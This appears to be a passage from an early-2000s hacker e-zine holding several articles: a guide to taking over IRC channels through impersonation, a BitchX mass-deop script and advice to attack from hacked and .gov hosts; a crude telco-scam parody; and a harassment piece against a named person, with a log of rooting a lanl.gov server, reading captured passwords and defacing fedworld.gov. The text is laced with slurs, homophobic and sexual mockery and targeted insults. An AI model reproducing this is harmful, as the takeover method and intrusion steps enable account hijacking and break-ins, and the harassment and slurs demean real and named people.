The tasks an attacker perforns to conventionally execute an attack can be
categorized as information gathering, exploitation, and metagaysis, as
described below.


8===D Information Gathering

The first phase of an attack, the information gathering phase, comprises the
determination of the characteristics of the target IRC channel such as, how
many people are in the channel, how many ops are in the channel, who is in
the channel, are their any opers, anyone you know, any ops you know, anyone
who is usually +o'd but is not in the channel currently.

8==D Finding out information about the channel

To find out the current status of a channel in BitchX, type:

"/chanst #channel"

Throughout the rest of this discussion we will assume we want to takeover
#phrack on efnet (we have done this many a times).

"/chanst #phrack"

chanst output:
ùíù Information for channel : #phrack
ùíù Channel created : 31337d 3h 13m 37s in memory Mon Mar 2 03:38:46 2000
MEM usage: Total: 8808 bytes [Nicks 7744 b Chan 924 b Bans 140 b]
Ops [ 18] De-Ops [ 27] Bans [ 8] Unbans [ 24]
Topics [ 10] Kicks [ 19] Publics [ 245] Parts [ 5]
Signoffs [ 9] Joins [ 212] TotalBans [ 4] MaxBans [ 8]
ServOps [ 0] ServDeop [ 0] ServBans [ 0] ServUB [ 0]
Users Here [ 39] Users Away [ 5] Opped [ 0] Unopped [ 44]
TotalNicks [ 44] MaxNicks [ 58] ServerHops [ 7]
IRCops [1 ] (nyt)

Keep notice their is one irc op (nyt:author of scrollz or something, lame).

Next we will find out who exactly is on the channel issueing the command:

"/names #phrack"

names output:
[ gurt ] [@udp ] [@par ] [@nyt ] [ sub ]
[ TRON ] [ birdstyle ] [ ab- ] [ no_ana ] [@silitek ]
[@sh1fty32 ] [@enr1que ] [ sq ] [ kaotik ] [ phidias ]
[ SeaPea5 ] [ pheeble ] [ vlost_ ] [ redpantz ] [ Codiak ]
[ pezz ] [ juice_ ] [@pm ] [@felix ] [ arakis ]
[ bv- ] [@Dr_Eck ] [@minus ] [@knowfx ] [@sundevil ]
[ phonic ] [ harq ] [@cripto ] [ CeePee ] [ \\root\\ ]
[@devstderr ] [@E10k ] [ goonr ] [ TELESUP ] [Niacikatr ]
[@loki ] [@Swern ] [ lyser ] [@ezeikel ] [@jimjones ]
[@gaius ] [@jobe ] [ subz ] [ CP ] [@miff ]
[@hhaha ] [@almabra ] [ TRON_ ] [@t00nces ] [ x0x ]
[@mb ] [@vmy ] [@nottheim ] [@argv ] [ heka ]

8==D Scoping out the environment

Here we are learning who ops who. Sit around the channel for a while.
Find out who is a lazy oper. Their is always one oper who is real lazy
and doesn't make sure that is the actual person he or she is op'n.

Example of not so lazy channel operators:

ùíù mode/#phrack [+o awr] by felix
ùíù mode/#phrack [+o udp] by felix
ùíù mode/#phrack [+o silitek] by felix

This means two things:
1) He is /whois each nick, to verify, then op'n them.
2) He is /op each one of them

Option 1 is pretty scary, if he notices us, then our plan is dead and
channel security is hightened.

Example of a seemingly lazy channel operator:

ùíù mode/#phrack [+ooo awr route gaius] by jobe
ùíù mode/#phrack [+ooo devstderr wilkins_ peltier] by jobe

He most likely just op his pals so they can stay op and reop him. That's
pretty much how it works folks.


8===D Exploitation

The exploitation phase of an attack is the initial chronological point at
which an attacker commits to attempting to gain ops in the irc channel with
the motive of taking the channel over.

The data generated in the information gathering phase of the attack is used to
determined if any users in the target irc channel are vulnerable to weak
verification checks of other channel operators.

We choose an inhabbitant of #phrack, we choose awr. He is our test subject
for this paper. We jump on a nice shell with a rather uncatchy name. We need
to try and fit in as if we were the real awr.

ùíù awr [awr@hobbiton.org] has joined #phrack

Now we just sit and wait. We will most likely become an op due to the lack
of channel security. Our next phase involves Metagaysis, which brings
everything together into one big conglomaration. By the way their are various
tools to ensure channel security, among a few are: fedwire, ircwire, ircops,
channelsec9000, and eggdrop_fw1.tcl.

To summarize, the exploitation phase of an attack involves the compromise of
lack channel security in the target irc channel.


8===D Metagaysis

The metagaysis phase of the attack, as defined by Cheswick and Bellovin, can
be logically separated into two key components: 'consolidation', and
'continuation', described here:

{I} Consolidation Component

Once channel operator status has been obtain on a particular irc channel, the
attack proceeds with the consolidation component of metagaysis.

It is imperative to the attacker that the exploitation phase not be detected.
The attacker must become hidden and seem idle, and mesh in with the surrounding
inhabbitants of the irc channel.

Depending on the exploitation method employed, the exploitation phase may not
have granted the attack the highest level of privledge on the compromised
irc channel (+o), it might have yeilded +v. If you escelate to +v, I advise
just sitting back and waiting. Most +v users eventually get +o.

A client to enable remote unauthorized access is traditionally installed,
sometimes called a "back door" or a "re opping takeover client". A back door
client is used to idle in the channel in case your current client dies out
or is deop'd. Of course you must op your back door client at some point.
Traditionally it is advised to op your back door client when the channel is
very idle. After op'n your backdoor client, join with a few other accounts
to scroll past their scroll back.

In summary, the goals of the consolidation component of the metagaysis phase of
an attack, are to install your back door client and to somewhat remove all
traces of who op you / op your backdoor client of the channel operators. This
can't be fully acheived. A somewhat private method, is to join with random
'lamers' and "/exec -o head -n 40 /dev/urandom" into the target channel.

{II} Continuation Component

The continuation component of metagaysis is the most conceptually interesting
and challenging, in terms of attempting to construct a model of the attackers
actions.

Because a channel on the target network has been compromised, the attacker
can now utilize this to gain operator status in many other channels that
the person he is posing as frequents. Traditionally, the command "/whois
<nick>"
is used to find out which channels the target user frequents.

Metagaysis involves the use/abuse of trust relationships between a compromised
irc channel and other prospective target irc channels.

Once you have reached your goal, and compromised as many of the channels
you set out to compromise, you can now work towards the attack phase.


8===D The Attack Phase

First let me introduce to you a script which is very effective, and is used
throughout the rest of this incredible paper. The script is metagaysis.bx.
To load metagaysis.bx, simple type "/load ~/metagaysis.bx" in BitchX.

# metagaysis.bx -- Andrew J. Stewart <ajs@tentacle.org.uk>
# mods by FuNNi BuNNi

alias emdop {
^assign nomdop $* $N
^on ^who "*" {
if (match($1 $nomdop) == 0) {
if (rmatch($2 *@*)) {
^assign mdopz $1 ${mdopz}
}
}
}
^who *
/wait
/doemdop $mdopz
^assign -mdopz
^assign -nomdop
^on who - "*"
}

alias doemdop {
quote MODE $C -oooo $0 $1 $2 $3
if ([$4]) {/doemdop $4-}
}

metagaysis.bx usage:
After it is loaded simply: /emdop <nick1> <nick2...>
It will mass deop everyone except the nicknames supplied as the given args.

For the attack phase you *must* have a back door irc client +o'd and ready
for the attack. Usually this can be a client on another term. This can even
be your accomplace. This is needed to re +o any clients who will be kicked
or deop'd during the attack phase.

You will also need at least one extra takeover client. Usually it is best
to operate with a team of some sort.

{I} One to One

In the One to One model, you only have one other takeover client ready to
attack. Let's assume your partner in crime is operating the other client.
You must draw out the attack plan:

"When I op you, you /emdop <mynick> <backdoorclientnick>.
I will /emdop <yournick> <backdoorclientnick>"


It is as simple as that. Technical analysis of the above:
Once you op the other takeover client, the other takeover client will
mass deop the entire channel except for channel citizens <mynick> and
<backdoorclientnick>. <backdoorclientnick> is used for re +o. Also, it
is saying that I will mass deop everyone except channel citizens <yournick>
and <backdoorclientnick>. Again, <backdoorclientnick> is used for re +o.

Your backdoor client must be ready to reop yourself and your accomplace.
Usually in the other term you will use: /mode #phrack +o awr +o helper
and switch there to re +o when anyone is -o'd.

A One to One model is effective, but a Many to One model is even more
effective. For channels with less than 30 chan ops, One to One works
quite alright.

{II} Many to One

In the Many to One attack model, you will use more than one takeover client.
Again, the takeover clients can be your takeover teammates or other terms
on your takeover shells. The same method applies as the One to One model
except you must discuss your /emdop syntax with the rest of your team mates,
and get the ready for the attack.

A Many to One model is sufficient for channels with over 30 channel operators.


8===D Attack Strategies

Before I go any further, this section will breifly discuss attack strategies
in an irc information warfare setting. The next section (Putting it All
Together: An Real Attack) will give an in depth look into a pre-existing
channel takeover.

Their are many attack strategies one can use when the issue of channel
takeovers pops up.

* Join / Part the channel when over 95% of the channel is idle. This can
be accomplished when many of the channel citizens are sleeping. In the
common sense methodology I propose, if it's an USA channel, you might
want to carry out your join / partting at 7am EST.

* When issueing the attack, you might want to carry it out, again, when
everyone is sleeping and idle.

* Locate any channel protection bots, you might want to deop those immediatly.
Usually channel protection bots have mdop sensors, and will deop anyone +o
by the mass deopers, and also deop all of your takeover clients. These are
pretty smart, beware.

* If you have put distributed metagaysis to use, and also have acquired ops
in all of the channels you have wanted, it is advised that you take them
over all in the same time. Taking too long to takeover a channel may result
in a loss of operator status.

* The host you are takeing over with must be pretty quick. Expect to be hit
with a load of force by operators who wish to kill your connection. Takeking
over from hacked hosts and .gov boxes is highly advised, this way the angry
channel operators will think twice about the DoS.

* When you have taken over the channel, kick everybody out. Once everyone is
out (except for your takeover client(s) and backdoor client), invite a few
new backdoor clients that nobody knows about, and op them. This way if you
get DoS'd, your backdoor clients will still be there.


8===D Putting it All Together: An Real Attack

ùíù awr [awr@hobbiton.org] has joined #phrack
*one day later*
<jobe> y0
ùíù mode/#!w00w00 [+o awr] by jobe
ùíù mode/#phrack [+ooo awr Nirva gaius] by jobe
ùíù mode/#phrack [+ooo devstderr agentstl peltier] by jobe
ùíù mode/#phrack [+ooo jobe malfunk gaius] by awr
ùíù mode/#phrack [-ooo Nirva nyt devstderr] by malfunk
ùíù mode/#phrack [-ooo sh1fty32 enr1que pm] by malfunk
ùíù mode/#phrack [-ooo cripto t00nces argv] by malfunk
ùíù mode/#phrack [-ooo miff jimjones silitek] by malfunk
ùíù mode/#!w00w00 [-ooo dugsong provos str] by awr
ùíù mode/#!w00w00 [-ooo lst bind aempirei] by awr
ùíù mode/#phrack [-ooo nottheim mb hhaha] by malfunk
ùíù malfunk has been kicked out of #phrack by felix (mass deop detected)
ùíù mode/#!w00w00 [-ooo ksoze k2 duke] by awr
ùíù mode/#!w00w00 [-ooo jobe mhhz flsd] by awr
ùíù mode/#!w00w00 [-ooo nyt pm caddis] by awr
ùíù mode/#phrack [-ooo felix e10k swern] by awr
ùíù mode/#phrack [-ooo almabra jobe sundevil] by awr
ùíù mode/#phrack [-ooo par knowfx minus] by awr
ùíù mode/#phrack [-st] by awr
ùíù mode/#!w00w00 [-sk w00itup] by awr

8===D References

[1] William R. Cheswick & Steven M. Bellovin, "Firewalls: How To Keep
Herpies Out Of Your Pubic Hair."
, Addison-Wesley, 1994.

[2] Andrew J. Stewart, "Evolution in Network Cooter Protection", 1999.

[3] Roland J. Schemers III, "fagping", Stanford University, 1992.

[4] Michael Schiffman & David Goldsmith, "Firewalking - A Traceroute-Like
Analysis of IP Internet Retards We Are Lamers Ha Ha Ga Access Control
Lists"
, Cambridge Technology Partners, 1998. www.packetfactory.net.

[5] David C. M. Wood, Sean S. Coleman, & Michael F. Schwartz, "Fremont: A
System for Discovering Network Characteristics and Problems"
, University
of Colorado, 1993.

[6] Merit GateD Consortium, "ripquery - Local overflows4all", 1990-1995,
www.gated.org.

[7] Daniel V. Klein, "Foiling the Cracker; A Survey of, and Improvements to
Unix Password Security"
, Proceedings of the 14th DoE Computer Security
Group, 1991.

[8] Aleph One, "Smashing The Cooter For Fun And Profit", Phrack Magazine,
Volume 7, Issue 49, File 14 of 16, 1996, www.phrack.com.

[9] Dan Farmer & Wietse Venema, "Improving the Security of Your Site by
Looking At Loads Of Porno"
, 1993, www.fish.com.

[10] Michael D. Schiffman, Index, Phrack 53, Volume 8, Issue 53, Article 01
of 15, 1998, www.phrack.com.

[11] Dan Farmer, "COPS & ROBBERS", 1989, www.fish.com.

[12] Michael D. Schiffman, "LibGay", 1999, www.packetfactory.net.

[13] Stephen Northcutt, "SHADOW Indications Technical Analysis - Coordinated
Attacks and Anal Probes"
, Navel Surface Warfare Center, 1998.

[14] Michael D. Schiffman, "Project Faggot", Phrack 49, File 06 of 16, 1996,
www.phrack.com.

[15] Eugene H. Spafford, "The Internet Pedofile: An Analysis", Purdue
University, 1988.

[16] Dan Farmer & Weitse Venema, "SATAN & Me.", 1995, www.fish.com.

[17] Thomas H. Ptacek & Timothy N. Newsham, "Insertion, Evasion, and Denial
of Service: Getting passed first base on a date."
, Secure Networks Inc,
1998.

[18] Cult of the Dead Cooter, "Anal Orifice 2000 (a.k.a. BO2K)", 1999,
www.bo2k.com.

[19] Greg Hogland et al, 1999, www.rootkit.com.

8===D ~~~ EOF




.~v~----------------------------------------------------------~v~.
; *17* r1pp1ng 0ff ur locale telco -- hybrid ;
`----------------------------------------------------------------'

Werd up, this is hybrid of [F41TH / D4RKCYD3]. This isn't your
ordinary hybrid article (ripped info with dumb idiotic comments
from yours truly). No, this is something entirly original (unlike
all of my other articles). Here I will explain how you can rip
off your local telecom very easily. You can become a thousandaire
in no time. So read carefully! -- hybrid

COCOT - Customer Owned Coin Operated Telephone (Or at least that's
what I think it stands for). COCOT'z, they cost too much damn money.
Ever wonder why people would ever spend 35/25 pence just to check who
beeped them? I majored in marketing at Cambridge in the United Kingdom.
I understand the market economy quite well. Every business has its
competition, but, do COCOT's have competition? The answer is No. (not
signaling system No. 7, No. as in NO). In this paper I will breifly
explain how to make thousands, even millions of pounds, by ripping off
your telco.

If you live near a COCOT, then this will be alot easier. If you don't
however, get a very long telephone chord, you will need this. You also
need a telephone.

Breifly, the plan is to have the consumer use your telephone instead of
the payphone. You will offer your service for less, and have incentives
etc.

You will need an advertising strategy. You will need to get the consumer
to see what you are offering. Examples of great marketing advertising
strategies:

* Position your own payphone near the COCOT.
* Create a large cardboard cutout that illustrates you have your own
payphone, and it is cheaper.
* Advertise on the radio. It is advised to switch locations all of the
time, or Ma BELL might come after you.

Examples of marketing strategies I have used:

(1)
During a sweltering hot day in July, I position myself near a COCOT in
the very busy city of Leads. I bring popcorn, a portable tv, a bowl,
and some video tapes. I plug my telephone chord into the nearest jack,
and into my own payphone. I put the videotapes inside of the vcr. The
video tapes just so happen to be the finest of Debbie Does Dallas
pornography, a very good marketing strategy. I put the popcorn in the
bowl, the sweltering heat pops the popcorn. For every citizen who
approaches the COCOT I say "Hey there, I am offering my service for
quite less, would you like some popcorn?"
. This hook line snags them.
Simply tell them you are offering your service for '30 pence' instead
of 35 pence. If they refuse, start to bargain, offer more popcorn and
put the porno on fast motion. I have established a formula for this
marketing strategy:

For every citizen who uses the payphone (K), and the amount they give
me to use my payphone (X), I make (K) * (X).

I have made 1,000 pounds a day. You can make a lot of money too.


(2)
I am nowhere near a payphone, I am in texas on vacation with my friend
pbxphreak, lusta, and his girlfriend jennicide. We are near the YeeHaw
Swapshop, and we notice millions of people asking for a phone. This
place is a gold mine. So, we get out my GSM Cell Phone (top of the line)
and I have free local calls, all long distance calls are 25cents after 5
minutes, and 10 cents after that. Ok, so we put station our self near the
latrine. Lusta and Jennicide start to strip - a very good marketing
strategy. We also put up a sign 'every texan needing a phone must pay
only 1 dollar, but you will receive a blowjob from either lusta or
jennicide.'. Ironically, people who didn't even need to use the phone
were asking to use our phone, and had many dollars to spend using it.

We made over 20,000 $ that day.


Using similar strategies you can make tons of money, and, more importantly,
rip off the telecom. Ok, that is it for me, hope you hade fun reading this,
now go rip off some telco's.

-- hybrid [F41TH / D4RKCYD3]




.~v~----------------------------------------------------------~v~.
; *18* ~v~ fry sil foundation (FSF) -- sk1d ;
`----------------------------------------------------------------'

sil - a hackers tail of tyrany, by sk1d:
---------------------------------------'

####### ###### # # ##### ### #
# # # # # # # # #
# # # # # # # #
##### ###### # ##### # #
# # # # # # #
# # # # # # # #
# # # # ##### ### #######

LOGS PROVIDED BY:
The Big Kmart
Google.com Cache
Federal B. Investigation
Central I. Agency
Yahoo!
Fedworld
Lanl
SiliconInc

*NOTE* *NOTE* *NOTE* *NOTE* *NOTE* *NOTE* *NOTE* *NOTE* *NOTE*
quick note, FSF stickers and flyers at the end of this paper.
*NOTE* *NOTE* *NOTE* *NOTE* *NOTE* *NOTE* *NOTE* *NOTE* *NOTE*

it wuz a cle4r blak night, and a br1ght young st4r ar0se fr0m the m4ngl3d
m3sh of w0nd3r, his n4me, SIL. regulators by warren G and n8 dogg was
playing s0ftly in the background. sil, formerly known as sillywilly, ran a
website at www.antioffline.com, and frequ3ntz #antioffline on efnet. sil
wuz on the ph0ne w1th hiz fat h0e girlfriend Speedygirl. Speedygrl is a
m3mber 0f EHAP (ethical hackers against pornography), and has a w3bsite
*puke* at www.speedygirl.com.

*WARNING* *WARNING* *WARNING* *WARNING* *WARNING* *WARNING* *WARNING*
RUL3 NUMBER 0N3 0F H4CK1NG, dont spe4k t0 f@ foneb0ne ch1x wh1le ur h4kn,
u k4n l00z ur concentration, and eventually sl1p up and get *BUZTED*.
*WARNING* *WARNING* *WARNING* *WARNING* *WARNING* *WARNING* *WARNING*

keep in mind s1l iz kn0wn to be a sh0w 0ff. s0 sil says to speedygrl:

"lol, wanna see some neat shit.. hold on one sec!"

in the b4kground u kan he4r sil typing. as Speedygrl wonders what is
going on; she trys to get his attention repeatedly; he then ssh'z into
portal.lanl.gov at approximatly 2am:

anti(sil)$ ssh -l gregg portal.lanl.gov
gregg@portal.lanl.gov's password: XXXXXXXXX


Welcome to portal.lanl.gov. If you are an unauthorized user, logout
immediately. All connections and transactions are monitored and
reviewed by the portal administrator. Any illegal use of this server
will result in criminal prosecution. Type /afs9/help/portal for help.

portal:~$
portal:~$ w
<output deleted>
portal:~$ cd /tmp/.lhide
portal:/tmp/.lhide$ ./client -rootme
portal:/tmp/.lhide$ id
uid=0(root) gid=0(root) groups=31(users),50(lanl),101(afs),103(nsf),199(in2)
portal:/tmp/.lhide$ grep gregg .slog
gregg<->XXXXXXXXX<->fedworld.gov22
gregg<->XXXXXXXXX<->fedworld.gov22
gregg<->XXXXX<->fedworld.gov22
gregg<->XXXXXXXXX<->fedworld.gov22
gregg<->XXXXXXXXX<->fedworld.gov22
gregg<->XXXXXXXXX<->fedworld.gov22
portal:/tmp/.lhide$ ssh -l gregg fedworld.gov
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that the host key has just been changed.
Please contact your system administrator.
Add correct host key in /users/g/gregg/known_hosts to get rid of this message.
Agent forwarding is disabled to avoid attacks by corrupted servers.
X11 forwarding is disabled to avoid attacks by corrupted servers.
Are you sure you want to continue connecting (yes/no)? yes
greg@fedworld.gov's password: XXXXXXXXX

EVERYTHING IS MONITORED ON THIS SERVER
AUTHORIZED USE ONLY
UNAUTHORIZED USERS LOG OUT IMMEDIATLY!

gregg% cd /var/htdoc/fedworld/mian/
csh: cd: /var/htdoc/fedworld/mian/: No such file or directory
gregg% cd /var/htdoc/fedworld/main/
gregg% pwd
/var/htdoc/fedworld/main/
gregg% cat > iloveyou.html << EOFBITCH
<html>
<title>i love the hell out of you</title>
<P>hehehehe, the title is correct</P>
<P>i love you, happy belated birthday!</P>
</html>
EOFBITHC
EOFBITch
EOFBITCH
gregg%
gregg%
gregg% w
<output deleted>
gregg% w
<output deleted>
gregg% w
<output deleted>
gregg% w
<output deleted>
gregg% w
<output deleted>
gregg% w
<output deleted>
gregg% rm -rf iluvyou.html
gregg% exit
logout
Connection to fedworld.gov closed.
portal:/tmp/.lhide$ w
<output deleted>
portal:/tmp/.lhide$ exit
logout
Connection to portal.lanl.gov closed.
anti(sil)$

during the dur4tion fr0m wh1ch sil created iloveyou.html until he
deleted "iluvyou.html", Speedygrl was asked to visit that url:

"speedy, i got something for you heheh"
"what?"
"where?"
"check out www.fedworld.gov/iloveyou.html, its nice"
<time ellapses>
"hahahah thats so sweet"
"did you hack that?"

unben0unc3d t0 our idi0t sil, he l3ft iloveyou.html th3r3, and 0f c0urse,
Speedygrl load3d up her n3tsc4pe communicat0r and viewed it direktly from
www.speedygirl.com. a ph3w we4kz l8r, Speedygrl wuz r4ided, and she turned
sil in to save her f@ ass. sil is now serving a 5 ye4r sentence @ kp.

th1s iz the 0day truth, but besidez the fakt, sil is a fucking shmuck.


##### # # ##### # #
# # # # # # ## #
##### # # # # # # #
# # # # ##### # # #
# # # # # # # ##
##### #### # # # #

# # # # ##### # # ##### ###### # # # # #####
## ## # # # # # # # # # # # # # #
# ## # # # # ###### # # ##### # # #### # #
# # # # # # # ##### # # # # # #####
# # # # # # # # # # # # # # # #
# # #### # # # # # # #### # # # #

##### # # ##### # #
# # # # # # ## #
##### # # # # # # #
# # # # ##### # # #
# # # # # # # ##
##### #### # # # #


the FSF f0undation d0eznt w4nt this l4mer in the sk3ne any l0nger.
h1z site is completly worthless, everyth1ng he wr1tez is garbage.
if th3r3 d0ez bekome a free sil f0undation, the FrySF will become
incre4singly more vocal, &protest this to the f4rezt extent possible.
l3tz take a sm4ll t0ur of some 0f his BULLSHIT. l3tz c0ntinue.


here'z his lame profile of h1mself:
rwxr--r--, sil, sti9ma are all one person... Me, and I care not to
disclose anything about myself due to fears from Scientologists who
are pissed off at me for posting L Ron. Hubbard's FBI files, as
well as admins from SourceForge, FreeBSD.org, ABCNews.com,
Linux.com, Republican National Committee, and others who are
likewise pissed I made fun of their sites. sil is also wanted for
questioning by FEMA for the following picture.
^ ur als0 w4nt3d f0r the def4cement of fedworld.gov, bahahaha


here'z sil's clothing line, only f@ con nerdz purchase hiz cl0thez:
Pimped White T
$18.99
No root BSD T. Barcode says Powered by Hackers. Great for Defcon,
Blackhat Briefings, SANS conference, or just hanging out.
^ bahahahahhaha, n0w he'z we4rn p1nstripez


sil also hates skr1pt kidz, and crackers, chek this out:
Cracker Profiling

[sample3.gif]
Cracker Profiling

Cracker Profiling is a new stealth technique designed to save the
world from misconceptions about what cracker is and what a cracker
does. This section will be updated frequently when we get off our ass
and stop smoking those cute little white rocks in those beautiful
bottles with such wonderfully colored caps.

. . . : : Cracker Profiling : : . . .

[cracker-profiler.gif]

How To Be A Cracker Profiler - Part 1 - Introduction
An Overview - What would a cracker profiler do? (Let's first come up
with a job description)
Developing A Cracker's FingerPrint (What's In Common Doesn't Count, We
Need To Find What's Unique)
^ bahahah, SYSROOT:JPPROFILES:SIL


sil's pizz3d off @ people going t0 hiz lame website.. or is he lying:
Note to assholes who keep linking: We will continuously move pictures
here so hyperlinking will crash your browser and the browsers of
others who embed one of the images into some fucking forum. You don't
pay for our bandwidth so save the fucking files to your drive or
geoshitty website and hyperlink them from there, otherwise continue to
wonder why your browsers keep crashing like fucking retarded idiots.


sil d1d numerous interviewz with t0nz of idiots:
AntiOffline Interviews
S0ft Project
reported by:sil
S0ft Project is an Italian based security based group. Read on about
their thoughts on security, media, and beliefs.
S0ftProject
GhettoHackers
reported by:sil
GhettoHackers have won the capture the flag competition at a previous
Defcon and were cool enough to take the time and answer our questions
regarding script kiddies, about their group, and media questions.
Ghettohackers
Obecian
reported by:sil
Obecian is a kick ass hackers and author of Nemesis a packet inection
suite in which much of the theories in dos conceptions were formed
along with my studying of the CCIE and CCNA exams. He is a networking
genuis and was cool enough to answer some questions we sent him.
Obecian
Silicon Toad
reported by:sil
Silicon Toad is a legend in the security underground and an overall
cool ass friend. Read on about his views on security, media as well as
answers to: How he was introduced to security, history, etc.
Silicon Toad
ShadowVX
reported by:sil
ShadowVX is a virus creation team who answered our questions regarding
virus creation, malice viewed behind it as well as some other stuff we
asked.
ShadowVX
Mixter
reported by:sil
Mixter is one hell of a coder and overall cool guy. He is responsible
for the creation of a notorious Distributed Denial of Service tool and
winner of Packet Storm's DDoS paper.
Mixter w00w00
reported by:sil
w00w00 is one of the largest security groups in the world and
certainly one of the most talented groups of individuals on the
planet. Resposible for w00giving which is a collaboration of
advisories from a slew of groups read on as they answered our
questions.
w00w00
Rain Forest Puppy
reported by:sil
RFP is responsible for stealing my dirt bike as a kid and when I see
him I'm going to take back the green machine he stole out of my garage
and ping -f his network. Actually this is another one of the most
highly respected individuals on the security scene right now. He's
contributed numerous advisories and programs. I should ping -f him
though since all these script kiddiots now whisker scan my site...
hrmmm ;)
Rain Forest Puppy
Ken Williams
reported by:sil
Ken Williams is the founder of Packet Storm and one of the coolest
guys I've had the pleasure to associate with. He started Packet Storm
while attending NCSU and is one of the most respected names in
computer security. Many thanks go to Ken from myself and the crew here
since I've learned a hellish amount of stuff he posted on the original
PSS.
Ken Williams
DugSong
reported by:sil
DugSong is from Monkey.org and is deinifitely one of the top three
geniuses on the computer security scene. Read his views on computer
security related stuff which was an extremely thorough breakdown on
everything we asked
DugSong
^ l00k @ all thoze morons


excerpts from the w00w00 interview:

### ###
# # # # # # #### ## # #
# # # # # # # # # # # #
# # # # # # # # # #
# ## # # # # # # ### ###### #
## ## # # # # # # # # #
# # ### ### #### # # #

### ###
# # # # # # # ## # # ######
# # # # # # # # # ## ## #
# # # # # # # # # # ## # #####
# ## # # # # # # ###### # # #
## ## # # # # # # # # # #
# # ### ### ###### # # # # ######

w00w00 . org Staff speak
reported by: sil @ AntiOffline.com
AntiOffline staff members continue to sell our asses in order to
support our crack habits and continously pay for answers to our elite
ass questionees. While we do threatened all those questioned, we don't
neccessarily injure anyone unless they deserve it.

This weeks 10 questions go to w00w00 who are almost as elite as us. We
do not condone their actions but will warn them that our uberleet gcc
f00.c -o f00 && ./f00 skills will always prevail. As always our
premonitions of worldwide fear continue as team w00w00 admits to
something we knew all along, Team AntiOffline aren't just a bunch of
trin00'ing script kiddies after all.

2) People in the Computer Security Field flock to w00 advisories like
crackfiends at a 2 for 5 convention. How many members of w00w00
security are there in all and what exactly would you like to have
w00w00 as a group portrayed as?
^ bahahahahah, w00giving, w00xmas, w00chanakuh, all h0rrible ho4rdz 0f
w95, w98, w3.1 bugz, W0RTHLESS. P4TH3TIC. W00L4ME.

I think the best way to portray would be a professional non-profit
security team with a wide variety of backgrounds, originally being
derived from the underground. The name lets us interact with the
underground/hacker community but our work lets us interact with
professional/corporate community (http://razor.bindview.com). There
are, in all, 31-32 members in 7 countries, 11-12 states, and 3-4
continents. The reason an exactly number cannot be given is because we
a few bright=20 people who serve as "affiliates" rather than "members"
(work with us, but not for us).

10) Can we have an 0-day irc shell or e-mail account like
sil@sex0red.your.girlfriend.until.she.screamed.w00w00.org?
^ s0 he kan hak the USA g0vernmentz phr0m it.

Absolutely, I'll have our secretary get right on that.
^ p00r little minus

Many thanks go out to team w00w00 and their affiliates for giving us
the time of day. As for other groups... You suck... This includes you
l0pht for thinking I have any affiliation with Jane Vanisaprick of the
gay hacker site AntiOnline in your response to my 10 questions...
^ g00d th1ng u guyz didnt give him a shell, w00w00 w0ulda been in w00jail


sil's antioffline advisories:
0wn0rize.h
bitchslap.0
getchix0rbyname.0
geth00chiebyname.0
getslutbyname.0
getwh0rebyname.0
ms99-046
ms99-047
ms99-048
ms99-049
ms99-054
ms99-069
pimp.h
secksor.0
^ h0rrible


u w3nt 0ut and s4v3dd.... the b3zt.... f0r l4zt.. <- h0t lyrikz
sil's rfc for skript kiddiez:
AntiOffline Networking Group J. Oquendo
Request for Comments: 31337 Department of Information
Category: Informational University of Hackers
January 2001


Definition of a Script Kiddiot

Status of this Memo

This memo provides information for the Internet community. It does
not specify an Internet standard of any kind. Distribution of this
memo is unlimited.

Copyright Notice

Copyright (C) AntiOffline.com 2001. All Rights Reserved.

Abstract

This document describes in full illustration the definitions and
associations of a script kiddiot, their actions and their role on
the Internet in full gory details

1. INTRODUCTION

Script kiddiots are the foundation for anarchy and recklessness on
the Internet, and are often misconstrued and labeled as hackers by
media types who do little to investigate the heart of a matter.
Instead media often option to use the term hacker in an effort to
publish what they deem news to the extent of it being nothing more
than a story filled with inconsistencies, which attract visitors by
the use of the popular term hacker, and remember more traffic means
more advertisers to sell space to.

2.2.1 Definition of Script

The term script was compounded from shell scripts of pre written
programs that were created in most cases by others with true
skills then submitted to security based sites. These clueless
users then download these programs and use them for malicious
purposes such as attacking others or defacing websites.


FSF (FRY SILL FOUNDATION) STICKERS AND FLYERS. HANG THESE ON YOUR W4LL,
DUCKT4PE THESE T0 Y0UR C4R, SUPERGLUE THEM TO TELEPHONE P0LLZ, PASS THEM
OUT AT 2600 MEETS, TAPE THEM ONTO A WIFE BEATER, USE THEM AS DOG PAPER.

-- sticker1 "SILLYWILLY IS A SCRIPT KIDDIOT"

#### # # # # # # # # # # # #
# # # # # # # # # # # # #
#### # # # # # # # # # #
# # # # # # ## # # # # #
# # # # # # ## ## # # # #
#### # ###### ###### # # # # ###### ###### #

# ####
# #
# ####
# #
# # #
# ####

#
# #
# #
# #
#######
# #
# #

#### #### ##### # ##### #####
# # # # # # # # #
#### # # # # # # #
# # ##### # ##### #
# # # # # # # # #
#### #### # # # # #

# # # ##### ##### # #### #####
# # # # # # # # # # #
#### # # # # # # # # #
# # # # # # # # # # #
# # # # # # # # # # #
# # # ##### ##### # #### #

-- end sticker1


-- sticker2 "FRY SIL"

####### ###### # # ##### ### #
# # # # # # # # #
# # # # # # # #
##### ###### # ##### # #
# # # # # # #
# # # # # # # #
# # # # ##### ### #######

-- end sticker2


-- sticker3 "FRY SIL"

#
## #
###############################
#################################
## # ##
# ## #
# #######
#####

## #
####################
####################
####################
## ##
##
###
#####
#######
#######
#####
## #
#### ###
#### #######
#### ###########
#### ############ #
##### ###########
#########
#####
#####
##### #
####
#


##### ###
##### ######
### ##########
## ##### ##
## ##### #
## ##### #
## #### ##
## ##### ##
########## #####
######### #####
###
## #
#################### ####
#################### #####
#################### ####
##
## #
#################################
#################################
#################################
##

-- end sticker3


-- sticker4 "FSF"

####### ##### #######
# # # #
# # #
##### ##### #####
# # #
# # # #
# ##### #

-- end sticker4




.~v~----------------------------------------------------------~v~.
; *19* ~v~ hacker survey -- ~el8 TEaM ;
`----------------------------------------------------------------'

We were going to MASS MAIL it with FateX9.0, but we decided not to:

NOTE: This is a chance to appear in our ezine without being made fun of.

Send all replies to el8@press.co.jp.

~el8 SURVEY - This is by no means SP-AM - ~el8 SURVERY:
------------------------------------------------------'

Congratulations! You have been selected as an eligible participant in the
~el8 hacker questionaire! Results and averages will be published in ~el8 zine,
